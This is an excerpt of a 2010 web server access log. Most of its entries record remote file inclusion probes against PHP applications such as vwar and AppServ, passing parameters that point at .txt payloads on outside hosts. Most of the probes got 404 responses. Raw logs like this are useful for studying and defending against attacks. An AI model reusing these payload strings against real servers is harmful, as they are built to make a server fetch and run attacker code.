125.247.160.130 - - [19/Mar/2010:04:23:49 -0400] "GET /logs/access_log.Q110031100%20%20/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
67.195.114.252 - - [19/Mar/2010:04:23:27 -0400] "GET /logs/error_log.Q109092700 HTTP/1.0" 200 3048218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.241.177.123 - - [19/Mar/2010:04:24:37 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:04:24:37 -0400] "GET /logs/access_log.Q109072700%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:04:24:37 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:24:52 -0400] "GET /logs/access_log.Q109122500%20%20//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:24:54 -0400] "GET /logs/error_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
